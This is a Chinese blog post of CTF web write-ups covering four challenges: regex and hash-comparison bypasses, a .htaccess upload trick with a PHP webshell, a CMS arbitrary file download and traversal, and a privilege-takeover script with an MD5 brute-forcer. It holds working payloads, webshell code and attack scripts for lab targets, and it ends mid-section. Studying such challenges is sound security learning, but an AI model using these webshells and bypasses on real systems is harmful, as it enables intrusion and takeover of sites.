<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="nssctf-3, shianer">
    <meta name="description" content="A Freshman">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>nssctf-3 | shianer</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="shianer" type="application/atom+xml">
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">shianer</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">shianer</div>
        <div class="logo-desc">
            
            A Freshman
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/21.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">nssctf-3</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/ctf%E9%A2%98%E7%9B%AE-web/">
                                <span class="chip bg-color">ctf题目--web</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2022-09-01
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h5 id="鹤城杯-2021-Middle-magic（WEB-PHP）"><a href="#鹤城杯-2021-Middle-magic（WEB-PHP）" class="headerlink" title="[鹤城杯 2021]Middle magic（WEB PHP）"></a>[鹤城杯 2021]Middle magic（WEB PHP）</h5> <?php 
 highlight_file(__FILE__);
 include "./flag.php"; 
 include "./result.php";
 if(isset($_GET['aaa']) && strlen($_GET['aaa']) < 20){  
 $aaa = **preg_replace**('/^(.*)level(.*)$/', '${1}<!-- filtered -->${2}', $_GET['aaa']); 
 if(preg_match('/pass_the_level_1#/', $aaa)){  
 echo "here is level 2";      
 if (isset($_POST['admin']) and isset($_POST['root_pwd'])) {       if ($_POST['admin'] == $_POST['root_pwd'])       
 echo '<p>The level 2 can not pass!</p>';     
 // START FORM PROCESSING
 else if ****(sha1($_POST['admin']) === sha1($_POST['root_pwd'])){         echo "here is level 3,do you kown how to overcome it?";         if (isset($_POST['level_3'])) {   
 $level_3 = **json_decode**($_POST['level_3']);                     if ($level_3->result == $result) {  
 echo "success:".$flag;  
 }    
 else {
 echo "you never beat me!";           }      
 }
 else{  
 echo "out";  
 }
 }   
 else{    
 die("no");       }     // perform validations on the form data     }
 else{       echo '<p>out!</p>'; 
 }
 }
 else{   
 echo 'nonono!';   }  
 echo '<hr>'; }
 ?><p>这里要绕过第一层：</p>
<p>绕过正则匹配，用于任意字符匹配并不包括换行符，而且<code>^ $</code>界定了必须在同一行，否则匹配不到，直接利用<code>%0a</code>，这里用到了换行绕过%0a，如果正则表达式没有使用多行模式(m)，那么就存在被绕过的可能。然后是因为URL中的#是位置标识符，<code>#</code>在参数里面并不会传递，需要被编码成<code>%23</code>。</p>
<p>第二层绕过数组</p>
<p>第三层绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">if (isset($_POST[&#x27;level_3&#x27;])) &#123;</span><br><span class="line">                  $level_3 = json_decode($_POST[&#x27;level_3&#x27;]);</span><br><span class="line">                  </span><br><span class="line">                  if ($level_3-&gt;result == $result) &#123;</span><br></pre></td></tr></table></figure>

<p>要经过js-encode编码一下，弱等于就好了</p>
<p>直接{“result”:0}</p>
<p>或者<code>$level_3-&gt;result == $result</code>,利用布尔<code>true</code>绕过</p>
<p>payload</p>
<p>GET： aaa=%0apass_the_level_1%23</p>
<p>POST:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">admin[]=0&amp;root_pwd[]=1&amp;level_3=&#123;&quot;result&quot;:true&#125;;</span><br></pre></td></tr></table></figure>

<h5 id="GXYCTF-2019-BabyUpload（WEB文件上传-htaccess）"><a href="#GXYCTF-2019-BabyUpload（WEB文件上传-htaccess）" class="headerlink" title="[GXYCTF 2019]BabyUpload（WEB文件上传.htaccess）"></a>[GXYCTF 2019]BabyUpload（WEB文件上传.htaccess）</h5><p>一个学习文件上传不错的题目，过滤了很多可能绕过的方法：</p>
<p>（1）<code>后缀名不能有ph！</code>对于<strong>文件后缀名</strong>的限制，修改为jpg</p>
<p>（2）<code>上传类型也太露骨了吧！</code>对<code>Content-Type</code>的限制，修改为<code>image/jpeg</code>即可绕过</p>
<p>(诶，别蒙我啊，这标志明显还是php啊<code>对上传文件的内容进行了检测，不能含有</code>&lt;?<code>，这里的PHP版本为：</code>PHP/5.6.23),过滤掉php一般写法就好GIF89a&lt;、script language=”php”&gt;eval($_POST[‘mochu7’]);&lt;、/script&gt;</p>
<p>这样就可以上传图片马了，但是没有文件包含漏洞，怎么解析呢。</p>
<p>看到报错的内容，服务器是阿帕奇的，<code>nginx</code>也是可以支持<code>.htaccess</code>的，所以这里就可以利用上传一个<code>.htaccess</code>文件将wen文件内容解析为php程序</p>
<p>传入一个.hatccess文件写入</p>
<p>&lt;FilesMatch  “wen”&gt;<br>SetHandler  application/x-httpd-php<br>&lt;。/FilesMatch&gt;</p>
<p>然后传入任意文件后缀为wen，文件类型判断时 内容加上GIF89a跳过即可：GIF89a&lt;。script language=”php”&gt;eval($_POST[c]);&lt;。/script&gt;，写入后直接post执行c=show_source(‘/flag’);就可以，当然：</p>
<p>@eval($_POST[c]);写马连shell也可以。</p>
<h5 id="GKCTF-2021-easycms（WEB-弱口令-目录穿越-后台RCE）"><a href="#GKCTF-2021-easycms（WEB-弱口令-目录穿越-后台RCE）" class="headerlink" title="[GKCTF 2021]easycms（WEB 弱口令 目录穿越 后台RCE）"></a>[GKCTF 2021]easycms（WEB 弱口令 目录穿越 后台RCE）</h5><p>是蝉知7.7欸~亲切的感觉</p>
<p>想到自己在护网的时候因为md在gh之后，所以很多洞都修了，就没挖出来，这里刚好可以复现一下，先找到登录页面admin.php弱口令进去，然后</p>
<p>7.7有一个命令执行漏洞</p>
<p>这题有两种方法：</p>
<p>1.任意文件下载：</p>
<p>设计——自定义——导出主题——保存</p>
<p>下载链接</p>
<p><a target="_blank" rel="noopener" href="http://1.14.71.254:28173/admin.php?m=ui&amp;f=downloadtheme&amp;theme=L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2RlZmF1bHQvMS56aXA=">http://1.14.71.254:28173/admin.php?m=ui&amp;f=downloadtheme&amp;theme=L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2RlZmF1bHQvMS56aXA=</a></p>
<p>最后是一串base64编码，解密后是/var/www/html/system/tmp/theme/default/12.zip而且是文件的绝对路径，我们直接包含/flag就可以了，base64加密一下成为L2ZsYWc=<br>payload：</p>
<p><a target="_blank" rel="noopener" href="http://cfc147be-ed41-45fc-a12f-672318d14a4f.node4.buuoj.cn:81/admin.php?m=ui&amp;f=downloadtheme&amp;theme=L2ZsYWc=">http://cfc147be-ed41-45fc-a12f-672318d14a4f.node4.buuoj.cn:81/admin.php?m=ui&amp;f=downloadtheme&amp;theme=L2ZsYWc=</a><br>这样就可以把包含flag的下载下来了</p>
<p>2.文件上传漏洞</p>
<p>设计——组件——素材库——上传素材，先上传一个txt文件然后编辑它的名称，改成…/…/…/…/…/system/tmp/cksj，然后回去自定义首页幻灯片里面编辑php代码，返回首页得到flag。</p>
<h5 id="湖湘杯-2021-final-Penetratable-WEB-PHP-哈希爆破-RCE-提权"><a href="#湖湘杯-2021-final-Penetratable-WEB-PHP-哈希爆破-RCE-提权" class="headerlink" title="[湖湘杯 2021 final]Penetratable(WEB PHP 哈希爆破 RCE 提权)"></a>[湖湘杯 2021 final]Penetratable(WEB PHP 哈希爆破 RCE 提权)</h5><ol>
<li>找前端js文件获取一些信息系</li>
<li>注册和登录界面二次sql注入</li>
<li>跑脚本找md5对应的值</li>
<li>提权</li>
</ol>
<p>界面上只有登录和注册界面所以我们先dirsearch扫一下，没什么</p>
<p>F12看到一些js文件,：</p>
<p>reg有一些路由接口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br></pre></td><td class="code"><pre><span class="line">function login()&#123;</span><br><span class="line">    let name=encodeURIComponent(Base64.encode($(&quot;.form-floating&gt;input&quot;).eq(0).val()))</span><br><span class="line">    let pass=hex_md5($(&quot;.form-floating&gt;input&quot;).eq(1).val())</span><br><span class="line">    $.ajax(&#123;</span><br><span class="line">        url: &#x27;/?c=app&amp;m=login&#x27;,</span><br><span class="line">        type: &#x27;post&#x27;,</span><br><span class="line">        data: &#x27;name=&#x27; + name+&#x27;&amp;pass=&#x27; + pass,</span><br><span class="line">        // async:true,</span><br><span class="line">        dataType: &#x27;text&#x27;,</span><br><span class="line">        success: function(data)&#123;</span><br><span class="line">            let res=$.parseJSON(data);</span><br><span class="line">            if (res[&#x27;login&#x27;])&#123;</span><br><span class="line">                switch (res[&#x27;type&#x27;])&#123;</span><br><span class="line">                    case &#x27;user&#x27;: location.href=&quot;/?c=user&quot;; break;</span><br><span class="line">                    case &#x27;admin&#x27;: location.href=&quot;/?c=admin&quot;; break;</span><br><span class="line">                    case &#x27;root&#x27;: location.href=&quot;/?c=root&quot;; break;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;else if(res[&#x27;alertFlag&#x27;])&#123;</span><br><span class="line">                alert(res[&#x27;alertData&#x27;]);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function userUpdateInfo()&#123;</span><br><span class="line">    let name=encodeURIComponent(Base64.encode($(&quot;.input-group&gt;input&quot;).eq(0).val()))</span><br><span class="line">    let oldPass=$(&quot;.input-group&gt;input&quot;).eq(1).val()?hex_md5($(&quot;.input-group&gt;input&quot;).eq(1).val()):&#x27;&#x27;;</span><br><span class="line">    let newPass=$(&quot;.input-group&gt;input&quot;).eq(2).val()?hex_md5($(&quot;.input-group&gt;input&quot;).eq(2).val()):&#x27;&#x27;;</span><br><span class="line">    let saying=encodeURIComponent(Base64.encode($(&quot;.input-group&gt;input&quot;).eq(3).val()))</span><br><span class="line">    $.ajax(&#123;</span><br><span class="line">        url: &#x27;/?c=user&amp;m=updateUserInfo&#x27;,</span><br><span class="line">        type: &#x27;post&#x27;,</span><br><span class="line">        data: &#x27;name=&#x27;+name+&#x27;&amp;newPass=&#x27;+newPass+&#x27;&amp;oldPass=&#x27;+oldPass+&#x27;&amp;saying=&#x27;+saying,</span><br><span class="line">        // async:true,</span><br><span class="line">        dataType: &#x27;text&#x27;,</span><br><span class="line">        success: function(data)&#123;</span><br><span class="line">            alertHandle(data);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function signOut()&#123;</span><br><span class="line">    $.ajax(&#123;</span><br><span class="line">        url: &#x27;/?c=app&amp;m=signOut&#x27;,</span><br><span class="line">        type: &#x27;get&#x27;,</span><br><span class="line">        dataType: &#x27;text&#x27;,</span><br><span class="line">        success: function(data)&#123;</span><br><span class="line">            alertHandle(data);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function alertHandle(data)&#123;</span><br><span class="line">    let res=$.parseJSON(data);</span><br><span class="line">    if(res[&#x27;alertFlag&#x27;])&#123;</span><br><span class="line">        alert(res[&#x27;alertData&#x27;]);</span><br><span class="line">    &#125;</span><br><span class="line">    if(res[&#x27;location&#x27;])&#123;</span><br><span class="line">        location.href=res[&#x27;location&#x27;];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function changeAdminPage(type)&#123;</span><br><span class="line">    let page=$(&#x27;.page&#x27;).text();</span><br><span class="line">    if (type==&#x27;next&#x27;)&#123;</span><br><span class="line">        location.href=&#x27;?c=admin&amp;m=getUserList&amp;page=&#x27;+(parseInt(page)+1);</span><br><span class="line">    &#125;</span><br><span class="line">    if (type==&#x27;last&#x27;)&#123;</span><br><span class="line">        location.href=&#x27;?c=admin&amp;m=getUserList&amp;page=&#x27;+(parseInt(page)-1);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">function changeRootPage(type)&#123;</span><br><span class="line">    let page=$(&#x27;.page&#x27;).text();</span><br><span class="line">    if (type==&#x27;next&#x27;)&#123;</span><br><span class="line">        location.href=&#x27;?c=root&amp;m=getUserInfo&amp;page=&#x27;+(parseInt(page)+1);</span><br><span class="line">    &#125;</span><br><span class="line">    if (type==&#x27;last&#x27;)&#123;</span><br><span class="line">        location.href=&#x27;?c=root&amp;m=getUserInfo&amp;page=&#x27;+(parseInt(page)-1);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function updatePass()&#123;</span><br><span class="line">    // let name=encodeURIComponent(Base64.encode($(&quot;.input-group&gt;input&quot;).eq(0).val()))</span><br><span class="line">    // let oldPass=$(&quot;.input-group&gt;input&quot;).eq(1).val()?hex_md5($(&quot;.input-group&gt;input&quot;).eq(1).val()):&#x27;&#x27;;</span><br><span class="line">    // let newPass=$(&quot;.input-group&gt;input&quot;).eq(2).val()?hex_md5($(&quot;.input-group&gt;input&quot;).eq(2).val()):&#x27;&#x27;;</span><br><span class="line">    // let saying=encodeURIComponent(Base64.encode($(&quot;.input-group&gt;input&quot;).eq(3).val()))</span><br><span class="line">    // $.ajax(&#123;</span><br><span class="line">    //     url: &#x27;/?c=admin&amp;m=updatePass&#x27;,</span><br><span class="line">    //     type: &#x27;post&#x27;,</span><br><span class="line">    //     data: &#x27;name=&#x27;+name+&#x27;&amp;newPass=&#x27;+newPass+&#x27;&amp;oldPass=&#x27;+oldPass+&#x27;&amp;saying=&#x27;+saying,</span><br><span class="line">    //     // async:true,</span><br><span class="line">    //     dataType: &#x27;text&#x27;,</span><br><span class="line">    //     success: function(data)&#123;</span><br><span class="line">    //         alertHandle(data);</span><br><span class="line">    //     &#125;</span><br><span class="line">    // &#125;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function adminHome()&#123;</span><br><span class="line">    location.href=&#x27;/?c=root&#x27;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function getUserInfo()&#123;</span><br><span class="line">    location.href=&#x27;/?c=root&amp;m=getUserInfo&#x27;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function getLogList()&#123;</span><br><span class="line">    location.href=&#x27;/?c=root&amp;m=getLogList&#x27;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function downloadLog(filename)&#123;</span><br><span class="line">    location.href=&#x27;/?c=root&amp;m=downloadRequestLog&amp;filename=&#x27;+filename;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function register()&#123;</span><br><span class="line">    let name=encodeURIComponent(Base64.encode($(&quot;.form-floating&gt;input&quot;).eq(2).val()))</span><br><span class="line">    let pass=hex_md5($(&quot;.form-floating&gt;input&quot;).eq(3).val())</span><br><span class="line">    let saying=encodeURIComponent(Base64.encode($(&quot;.form-floating&gt;input&quot;).eq(4).val()))</span><br><span class="line">    $.ajax(&#123;</span><br><span class="line">        url: &#x27;/?c=app&amp;m=register&#x27;,</span><br><span class="line">        type: &#x27;post&#x27;,</span><br><span class="line">        data: &#x27;name=&#x27; + name+&#x27;&amp;pass=&#x27; + pass +&#x27;&amp;saying=&#x27; +saying,</span><br><span class="line">        dataType: &#x27;text&#x27;,</span><br><span class="line">        success: function(data)&#123;</span><br><span class="line">            // console.log(data);</span><br><span class="line">            alertHandle(data);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>看到root，admin，user，所以推测有一些利用点：</p>
<p>（1）其他两个已经存在，所以我们可以注册user用户进去，发现有修改密码的模块，网上有说法可以通过抓包修改admin的密码，但是这一步不知道是不是被注释，用不了。</p>
<p>![屏幕截图 2022-09-03 135616](/../../做题的截图/屏幕截图 2022-09-03 135616.png)</p>
<p>（2）同时关于修改密码，我想到之前sql的二次注入：</p>
<p>注册admin’#等登录，但是这个办法无法修改root密码，所以看到js里面有一段注释代码：利用这个方法改变root，发现不行，没有权限，而且admin界面还没法修改密码。</p>
<p>回看js代码，发现有段代码注释点发现是个改变密码的页面</p>
<p>尝试通过admin来修改root的密码</p>
<pre><code>import requests
import base64
from hashlib import md5

url = &#39;http://ip地址/&#39;
url1 = url + &#39;?c=app&amp;m=login&#39;
url2 = url + &#39;?c=admin&amp;m=updatePass&#39;

user1 = base64.b64encode(b&#39;admin&#39;).decode()
user2 = base64.b64encode(b&#39;root&#39;)
pass1 = md5(b&#39;111&#39;).hexdigest()#需要修改自己的admin密码
pass2 = md5(b&#39;root&#39;).hexdigest()

sess = requests.Session()

data = &#123;
    # admin/111
    &quot;name&quot;: user1,    # admin
    &quot;pass&quot;: pass1     # 111
&#125;
r = sess.post(url1, data=data)
print(r.text)

data = &#123;
&quot;name&quot;: user2,       # root
&quot;newPass&quot;: pass2,    # root
&quot;oldPass&quot;: pass1,    # 111
&quot;saying&quot;: user2
&#125;
r = sess.post(url2, data=data)
print(r.text)
</code></pre>
<p>返回这个，成功修改</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;login&quot;:true,&quot;type&quot;:&quot;admin&quot;&#125; &#123;&quot;alertData&quot;:&quot;\u4fee\u6539\u6210\u529f&quot;,&quot;location&quot;:&quot;\/?c=admin&quot;,&quot;alertF</span><br></pre></td></tr></table></figure>

<p>有一个下载页面：</p>
<p>抓包，尝试读取文件内容,<strong>存在目录穿越的漏洞</strong>phpinfo.php</p>
<p>这个哈希只有爆破了</p>
<p>这个字符串只能一个个试，跑得有点久</p>
<p>from hashlib import md5<br>md=”3fde6bb0541387e4ebdadf7c2ff31123”<br>str=”123456789zxcvbnmasdfghjklqwertyuiop”<br>flag=””<br>for i in str:<br>    for j in str:<br>        for k in str:<br>            for m in str:<br>                for n in str:<br>                    for a in str:<br>                        flag=i+j+k+m+n+a<br>                        if md5(flag.encode()).hexdigest()==md:<br>                            print(flag)<br>                            break得到<code>1q2w3e</code></p>
<p>直接上蚁剑</p>
<p>虚拟终端没有权限，只能提取</p>
